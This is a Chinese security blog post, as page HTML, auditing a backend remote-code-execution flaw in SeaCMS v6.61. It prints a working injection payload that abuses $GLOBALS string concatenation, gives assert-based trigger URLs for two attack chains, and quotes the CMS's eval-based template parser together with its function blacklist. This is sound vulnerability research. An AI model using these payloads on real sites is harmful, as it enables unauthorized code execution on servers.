<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon.ico?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="关于seacms v6.61后台getshell的深入分析 环境采用ubuntu16.04+apache2+php5.6+mysql5.7搭建时踩了很多坑，过程十分艰难。。 漏洞复现在后台-&amp;gt;添加影片-&amp;gt;图片地址出注入代码1&amp;#123;if:1)$GLOBALS[&apos;_G&apos;.&apos;ET&apos;][a]($GLOBALS[&apos;_G&apos;.&apos;ET&apos;][b]);//&amp;#125;&amp;#123;end if&amp;#12">
<meta property="og:type" content="article">
<meta property="og:title" content="seacms v6.61-GetShell">
<meta property="og:url" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/index.html">
<meta property="og:site_name" content="Altm4nz">
<meta property="og:description" content="关于seacms v6.61后台getshell的深入分析 环境采用ubuntu16.04+apache2+php5.6+mysql5.7搭建时踩了很多坑，过程十分艰难。。 漏洞复现在后台-&amp;gt;添加影片-&amp;gt;图片地址出注入代码1&amp;#123;if:1)$GLOBALS[&apos;_G&apos;.&apos;ET&apos;][a]($GLOBALS[&apos;_G&apos;.&apos;ET&apos;][b]);//&amp;#125;&amp;#123;end if&amp;#12">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/1.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/2.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/3.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/5.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/4.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/6.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/7.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/8.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/9.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/10.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/11.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/12.png">
<meta property="og:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/13.png">
<meta property="og:updated_time" content="2018-09-27T12:14:56.715Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="seacms v6.61-GetShell">
<meta name="twitter:description" content="关于seacms v6.61后台getshell的深入分析 环境采用ubuntu16.04+apache2+php5.6+mysql5.7搭建时踩了很多坑，过程十分艰难。。 漏洞复现在后台-&amp;gt;添加影片-&amp;gt;图片地址出注入代码1&amp;#123;if:1)$GLOBALS[&apos;_G&apos;.&apos;ET&apos;][a]($GLOBALS[&apos;_G&apos;.&apos;ET&apos;][b]);//&amp;#125;&amp;#123;end if&amp;#12">
<meta name="twitter:image" content="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"right","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/"/>





  <title>seacms v6.61-GetShell | Altm4nz</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Altm4nz</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://altmanz.cn/2018/09/27/seacmsv6-61-getshell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Altm4nz">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/IMG_4178.JPG">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Altm4nz">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">seacms v6.61-GetShell</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-09-27T09:11:07+08:00">
                2018-09-27
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>关于seacms v6.61后台getshell的深入分析</p>
<h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><p>采用ubuntu16.04+apache2+php5.6+mysql5.7<br>搭建时踩了很多坑，过程十分艰难。。</p>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><p>在后台-&gt;添加影片-&gt;图片地址出注入代码<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="keyword">if</span>:<span class="number">1</span>)$GLOBALS[<span class="string">'_G'</span>.<span class="string">'ET'</span>][a]($GLOBALS[<span class="string">'_G'</span>.<span class="string">'ET'</span>][b]);//&#125;&#123;end <span class="keyword">if</span>&#125;</span><br></pre></td></tr></table></figure></p>
<p>之后访问<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/details/index.php?1.html&amp;m=admin&amp;a=assert&amp;b=phpinfo()</span><br></pre></td></tr></table></figure></p>
<p>即可getshell</p>
<h1 id="审计代码"><a href="#审计代码" class="headerlink" title="审计代码"></a>审计代码</h1><p>先从他的注入点追踪,在图片地址处输入test然后抓包测试，<br><img src="/2018/09/27/seacmsv6-61-getshell/1.png" alt="123"><br>直接定位到关键文件admin/admin_video.php，GET参数action=save&amp;acttype=add，和变量v_pic.<br><img src="/2018/09/27/seacmsv6-61-getshell/2.png" alt=""><br>在admin_video.php中寻找v_pic变量<br><img src="/2018/09/27/seacmsv6-61-getshell/3.png" alt=""><br>跟进cn_substrR函数<br><img src="/2018/09/27/seacmsv6-61-getshell/5.png" alt=""><br>是一个对变量进行安全处理的函数, 继续跟进acttype=add，v_pic已经存入数据库。<br><img src="/2018/09/27/seacmsv6-61-getshell/4.png" alt=""><br>此时污点数据追踪到头了。转头去分析漏洞利用页面/details/index.php?1.html<br>首先对url截取，然后强转int,得到了cfg_paramid<br><img src="/2018/09/27/seacmsv6-61-getshell/6.png" alt=""><br>然后在 echoContent 函数中取出来了v_pic参数，并进行处理，将v_pic拼接到了content中，<br><img src="/2018/09/27/seacmsv6-61-getshell/7.png" alt=""><br>继续追踪$content，定位到语句<br><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$content=$mainClassObj-&gt;parseIf($content);</span><br></pre></td></tr></table></figure></p>
<p>跟进parseIf函数<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">parseIf</span><span class="params">($content)</span></span>&#123;</span><br><span class="line">                <span class="keyword">if</span> (strpos($content,<span class="string">'&#123;if:'</span>)=== <span class="keyword">false</span>)&#123;</span><br><span class="line">                <span class="keyword">return</span> $content;</span><br><span class="line">                &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">                $labelRule = buildregx(<span class="string">"&#123;if:(.*?)&#125;(.*?)&#123;end if&#125;"</span>,<span class="string">"is"</span>);</span><br><span class="line">                $labelRule2=<span class="string">"&#123;elseif"</span>;</span><br><span class="line">                $labelRule3=<span class="string">"&#123;else&#125;"</span>;</span><br><span class="line">                preg_match_all($labelRule,$content,$iar);</span><br><span class="line">        <span class="keyword">foreach</span>($iar <span class="keyword">as</span> $v)&#123;</span><br><span class="line">            $iarok[] = str_ireplace(<span class="keyword">array</span>(<span class="string">'unlink'</span>,<span class="string">'opendir'</span>,<span class="string">'mysqli_'</span>,<span class="string">'mysql_'</span>,<span class="string">'socket_'</span>,<span class="string">'curl_'</span>,<span class="string">'base64_'</span>,<span class="string">'putenv'</span>,<span class="string">'popen('</span>,<span class="string">'phpinfo'</span>,<span class="string">'pfsockopen'</span>,<span class="string">'proc_'</span>,<span class="string">'preg_'</span>,<span class="string">'_GET'</span>,<span class="string">'_POST'</span>,<span class="string">'_COOKIE'</span>,<span class="string">'_REQUEST'</span>,<span class="string">'_SESSION'</span>,<span class="string">'_SERVER'</span>,<span class="string">'assert'</span>,<span class="string">'eval('</span>,<span class="string">'file_'</span>,<span class="string">'passthru('</span>,<span class="string">'exec('</span>,<span class="string">'system('</span>,<span class="string">'shell_'</span>), <span class="string">'@.@'</span>, $v);</span><br><span class="line">        &#125;</span><br><span class="line">        $iar = $iarok;  </span><br><span class="line">        $arlen=count($iar[<span class="number">0</span>]);</span><br><span class="line">		$elseIfFlag=<span class="keyword">false</span>;</span><br><span class="line">		<span class="keyword">for</span>($m=<span class="number">0</span>;$m&lt;$arlen;$m++)&#123;</span><br><span class="line">			$strIf=$iar[<span class="number">1</span>][$m];</span><br><span class="line">			$strIf=<span class="keyword">$this</span>-&gt;parseStrIf($strIf);</span><br><span class="line">			$strThen=$iar[<span class="number">2</span>][$m];</span><br><span class="line">			$strThen=<span class="keyword">$this</span>-&gt;parseSubIf($strThen);</span><br><span class="line">			<span class="keyword">if</span> (strpos($strThen,$labelRule2)===<span class="keyword">false</span>)&#123;</span><br><span class="line">				<span class="keyword">if</span> (strpos($strThen,$labelRule3)&gt;=<span class="number">0</span>)&#123;</span><br><span class="line">					$elsearray=explode($labelRule3,$strThen);</span><br><span class="line">					$strThen1=$elsearray[<span class="number">0</span>];</span><br><span class="line">					$strElse1=$elsearray[<span class="number">1</span>];</span><br><span class="line">					@<span class="keyword">eval</span>(<span class="string">"if("</span>.$strIf.<span class="string">")&#123;\$ifFlag=true;&#125;else&#123;\$ifFlag=false;&#125;"</span>);</span><br><span class="line">					<span class="keyword">if</span> ($ifFlag)&#123; $content=str_replace($iar[<span class="number">0</span>][$m],$strThen1,$content);&#125; <span class="keyword">else</span> &#123;$content=str_replace($iar[<span class="number">0</span>][$m],$strElse1,$content);&#125;</span><br><span class="line">				&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">				@<span class="keyword">eval</span>(<span class="string">"if("</span>.$strIf.<span class="string">") &#123; \$ifFlag=true;&#125; else&#123; \$ifFlag=false;&#125;"</span>);</span><br><span class="line">				<span class="keyword">if</span> ($ifFlag) $content=str_replace($iar[<span class="number">0</span>][$m],$strThen,$content); <span class="keyword">else</span> $content=str_replace($iar[<span class="number">0</span>][$m],<span class="string">""</span>,$content);&#125;</span><br><span class="line">			&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">				$elseIfArray=explode($labelRule2,$strThen);</span><br><span class="line">				$elseIfArrayLen=count($elseIfArray);</span><br><span class="line">				$elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen<span class="number">-1</span>]);</span><br><span class="line">				$resultStr=$elseIfSubArray[<span class="number">1</span>];</span><br><span class="line">				$elseIfArraystr0=addslashes($elseIfArray[<span class="number">0</span>]);</span><br><span class="line">				@<span class="keyword">eval</span>(<span class="string">"if($strIf)&#123;\$resultStr=\"$elseIfArraystr0\";&#125;"</span>);</span><br><span class="line">				<span class="keyword">for</span>($elseIfLen=<span class="number">1</span>;$elseIfLen&lt;$elseIfArrayLen;$elseIfLen++)&#123;</span><br><span class="line">					$strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],<span class="string">":"</span>,<span class="string">"&#125;"</span>,<span class="string">""</span>);</span><br><span class="line">					$strElseIf=<span class="keyword">$this</span>-&gt;parseStrIf($strElseIf);</span><br><span class="line">					$strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],<span class="string">"&#125;"</span>,<span class="string">""</span>,<span class="string">"start"</span>));</span><br><span class="line">					@<span class="keyword">eval</span>(<span class="string">"if("</span>.$strElseIf.<span class="string">")&#123;\$resultStr=\"$strElseIfThen\";&#125;"</span>);</span><br><span class="line">					@<span class="keyword">eval</span>(<span class="string">"if("</span>.$strElseIf.<span class="string">")&#123;\$elseIfFlag=true;&#125;else&#123;\$elseIfFlag=false;&#125;"</span>);</span><br><span class="line">					<span class="keyword">if</span> ($elseIfFlag) &#123;<span class="keyword">break</span>;&#125;</span><br><span class="line">				&#125;</span><br><span class="line">				$strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[<span class="number">0</span>],<span class="string">":"</span>,<span class="string">"&#125;"</span>,<span class="string">""</span>);</span><br><span class="line">				$strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[<span class="number">0</span>],<span class="string">"&#125;"</span>,<span class="string">""</span>,<span class="string">"start"</span>));</span><br><span class="line">				<span class="keyword">if</span>(strpos($strElseIf0,<span class="string">'=='</span>)===<span class="keyword">false</span>&amp;&amp;strpos($strElseIf0,<span class="string">'='</span>)&gt;<span class="number">0</span>)$strElseIf0=str_replace(<span class="string">'='</span>, <span class="string">'=='</span>, $strElseIf0);</span><br><span class="line">				@<span class="keyword">eval</span>(<span class="string">"if("</span>.$strElseIf0.<span class="string">")&#123;\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;&#125;"</span>);</span><br><span class="line">				$content=str_replace($iar[<span class="number">0</span>][$m],$resultStr,$content);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> $content;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure></p>
<p>parseIf函数对$content进行了简单的正则和黑名单后进行了eval执行。<br>再回到CVE利用的payload<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="keyword">if</span>:<span class="number">1</span>)$GLOBALS[<span class="string">'_G'</span>.<span class="string">'ET'</span>][a]($GLOBALS[<span class="string">'_G'</span>.<span class="string">'ET'</span>][b]);//&#125;&#123;end <span class="keyword">if</span>&#125;</span><br></pre></td></tr></table></figure></p>
<p>payload用简单的字符串拼接绕过了正则，利用$GLOBALS执行了代码。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@eval("if(".$strIf.") &#123; \$ifFlag=true;&#125; else&#123; \$ifFlag=false;&#125;");</span></span><br></pre></td></tr></table></figure></p>
<p>相当于 @eval($_GET<a href="$_GET[b]">a</a>);</p>
<p>总结一下流程:<br>①$v_pic注入恶意数据存入数据库<br>②echoContent()取出$v_pic，拼接进$content<br>③parseIf()中eval()执行$content中的代码</p>
<h1 id="第二条攻击链"><a href="#第二条攻击链" class="headerlink" title="第二条攻击链"></a>第二条攻击链</h1><p>parseif()函数由于过滤不严格导致了getshell，而整个框架中利用了多次parseif()函数。<br>通过定位parseIf以及寻找可控变量可以发现第二条攻击链。<br>在模板变量中发现了{playpage:from}，定位到这个变量在video/index.php中来自v_playdata<br><img src="/2018/09/27/seacmsv6-61-getshell/8.png" alt=""><br>继续跟进v_playdata，通过admin_collect.php中$v_playfrom,$v_playurl存入数据库。<br><img src="/2018/09/27/seacmsv6-61-getshell/9.png" alt=""><br>继续跟进$v_playfrom,$v_playurl,定位到admin/back/templets/admin_video_edit.htm<br><img src="/2018/09/27/seacmsv6-61-getshell/10.png" alt=""><br>通过播放来源传入参数v_playfrom。<br>测试一遍攻击路线，通过后台系统设置，添加播放源，在播放源处添加攻击代码<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="keyword">if</span>:<span class="number">1</span>)$GLOBALS[<span class="string">'_G'</span>.<span class="string">'ET'</span>][a]($GLOBALS[<span class="string">'_G'</span>.<span class="string">'ET'</span>][b]);die();//&#125;&#123;end <span class="keyword">if</span>&#125;</span><br></pre></td></tr></table></figure></p>
<p>添加成功，然后选择添加影片，播放源选择我们注入的代码。<br><img src="/2018/09/27/seacmsv6-61-getshell/11.png" alt=""><br>注意此时v_playfrom[1]只截取了部分payload，需要抓包修改v_playfrom[1]的内容，<br><img src="/2018/09/27/seacmsv6-61-getshell/12.png" alt=""><br>添加成功后访问<br><figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">http:</span><span class="comment">//127.0.0.1/video/index.php?1-0-0.html&amp;a=assert&amp;b=phpinfo();</span></span><br><span class="line"><span class="comment">//1-0-0.html是刚添加的影片编号</span></span><br></pre></td></tr></table></figure></p>
<p><img src="/2018/09/27/seacmsv6-61-getshell/13.png" alt=""><br>成功getshell。</p>
<p>攻击链总结<br>①通过v_playfrom传入恶意代码，存入v_playdata<br>②添加影片通过选择恶意播放源载入v_playdata中的恶意代码<br>③video/index.php播放影片时加载v_playdata，拼接进$content<br>④触发parseIf($content)执行恶意代码</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/22/WDB-2/" rel="next" title="WDB.2">
                <i class="fa fa-chevron-left"></i> WDB.2
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/IMG_4178.JPG"
                alt="Altm4nz" />
            
              <p class="site-author-name" itemprop="name">Altm4nz</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="mailto:872801413@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#环境"><span class="nav-number">1.</span> <span class="nav-text">环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞复现"><span class="nav-number">2.</span> <span class="nav-text">漏洞复现</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#审计代码"><span class="nav-number">3.</span> <span class="nav-text">审计代码</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#第二条攻击链"><span class="nav-number">4.</span> <span class="nav-text">第二条攻击链</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Altm4nz</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
